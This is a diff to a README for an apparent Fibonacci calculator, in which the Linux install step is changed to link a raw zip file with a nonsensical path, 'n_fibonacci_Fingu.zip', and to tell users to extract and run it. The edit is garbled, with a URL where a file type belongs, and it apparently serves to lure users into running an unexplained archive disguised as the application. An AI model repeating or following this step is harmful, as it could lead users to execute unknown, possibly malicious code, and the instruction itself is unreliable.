Bauer14589/fibonacci-2n-1/README.md

 4. **Install the Application**:
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts to install.
    - For macOS: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and run the application from the terminal.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/Bauer14589/fibonacci-2n-1/main/Monopylaria/n_fibonacci_Fingu.zip` file and run the application from the terminal.

 5. **Run the Application**: Once installed, locate the application on your computer and open it to start calculating Fibonacci numbers.